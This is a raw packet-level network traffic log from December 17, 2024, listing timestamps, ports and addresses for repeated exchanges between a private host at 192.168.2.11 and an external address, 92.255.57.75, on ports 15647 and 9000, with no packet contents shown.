Dec 17, 2024 08:40:27.346654892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.346700907 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.363325119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.366419077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.390877962 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.390888929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.391011953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.422550917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.454171896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.454319954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.454638004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.474486113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.517016888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.519853115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.558177948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.558305025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.558434010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.561857939 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.590286016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.590322018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.590507030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.633708954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.633754969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.633869886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.664323092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.664421082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.664428949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.679373980 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.679398060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.679471970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.710218906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.710330963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.750262022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.780949116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.784163952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.784658909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.806282043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.830297947 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.830789089 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.856415987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.856592894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.870146990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.870223999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.894614935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.900867939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.901854992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.922147989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.926214933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.930619001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.950829983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.953315020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.979712009 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:27.990005016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:27.995990992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.014700890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.017961025 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.022452116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.026096106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.042037010 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.046739101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.063386917 CET	9000	50055	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.063534975 CET	9000	50055	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.063631058 CET	50055	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.063822985 CET	50055	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.068367004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.069997072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.070070028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.070164919 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.073189974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.073350906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.093534946 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.099545956 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.103174925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.119688988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.121201038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.145920992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.146956921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.166716099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.170229912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.174029112 CET	50056	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.184695005 CET	9000	50055	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.187846899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.187952042 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.188005924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.188158035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.190340042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.190445900 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.190798044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.194283009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.194415092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.209477901 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.209583044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.214396954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.214517117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.221761942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.221843004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.221932888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.242165089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.242265940 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.265710115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.266109943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.267350912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.271183014 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.271200895 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.271250963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.271250963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.296215057 CET	9000	50056	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.296284914 CET	50056	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.299192905 CET	50056	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.305430889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.305501938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.305658102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.308320045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.308478117 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.308505058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.309936047 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.310161114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.315207005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.315387964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.332463026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.332746983 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.341623068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.341639996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.341706038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.359944105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.360145092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.368793964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.368968964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.369036913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.395684958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.395837069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.395868063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.419914961 CET	9000	50056	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.429260015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.429276943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.429409027 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.433303118 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.433365107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.452697039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.452800989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.459402084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.459489107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.462173939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.462208986 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.462291956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.487565994 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.487660885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.487659931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.506511927 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.507083893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.511967897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.512025118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.512053013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.522056103 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.522264004 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.539809942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.539849043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.539916992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.553751945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.553860903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.554588079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.572516918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.579387903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.580401897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.580437899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.580514908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.580548048 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.585524082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.585664034 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.585757971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.606745005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.617985964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.618031979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.618213892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.631896973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.632020950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.632134914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.645466089 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.645894051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.645994902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.660675049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.660759926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.660897970 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.680942059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.692579031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.694197893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.700494051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.702572107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.704319954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.704456091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.704818964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.704870939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.704889059 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.704916000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.707952023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.726768970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.730020046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.752379894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.754439116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.758308887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.766834021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.770953894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.780736923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.782578945 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.799998045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.800949097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.801126957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.819598913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.822441101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.822793961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.822906971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.834274054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.834836960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.869836092 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.872884035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.874079943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.878042936 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.882405043 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.902468920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.904251099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.919028044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.919146061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.919281006 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.936841011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.939460039 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.942730904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.942804098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.943901062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.943960905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.944035053 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.944087982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.947757006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.950284958 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.974066019 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:28.991442919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.992465019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.992479086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:28.992615938 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.002450943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.005944014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.014786005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.017576933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.017699957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.017751932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.024388075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.042363882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.042474985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.054894924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.054936886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.055023909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.056895971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.056993961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.064613104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.064793110 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.082638979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.082712889 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.082736969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.094124079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.094222069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.112600088 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.112679005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.112823963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.126472950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.126549959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.131011963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.131079912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.131086111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.131258011 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.146794081 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.146872044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.174865961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.175288916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.184499979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.184511900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.184648991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.195738077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.195784092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.195800066 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.209634066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.209722996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.229015112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.231376886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.231532097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.231631041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.246462107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.246537924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.246589899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.255040884 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.255050898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.255112886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.264569044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.264620066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.264668941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.287206888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.295255899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.295864105 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.305061102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.307971954 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.315823078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.318922043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.318936110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.319040060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.351413965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.351424932 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.351497889 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.355405092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.355422974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.355480909 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.357939959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.357954025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.357980013 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.357997894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.375400066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.376770973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.376784086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.376811028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.376835108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.387819052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.387984991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.407835007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.417427063 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.417439938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.417543888 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.436767101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.436811924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.437021017 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.438626051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.438699007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.471381903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.471519947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:29.477778912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.477809906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:29.477897882 CET	50034	15647	192.168.2.11	92.255.57.75
